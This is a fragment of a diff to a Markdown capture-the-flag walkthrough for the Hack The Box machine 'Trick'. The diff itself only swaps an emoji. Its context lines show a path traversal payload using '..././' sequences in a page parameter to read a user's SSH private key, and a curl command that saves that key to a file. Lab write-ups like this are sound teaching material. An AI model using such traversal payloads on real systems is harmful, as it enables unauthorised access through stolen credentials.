4wayhandshake/4wayhandshake.github.io/content/walkthrough/trick.md

 http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././home/michael/.ssh/id_rsa
 ```

-Hooray :tada: That worked!
+Hooray 🎉 That worked!
 Only the formatting of the ssh key is not idea.
 I'll use curl to dump it into a file directly, instead:

 ```bash
 curl http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././home/michael/.ssh/id_rsa -o id_rsa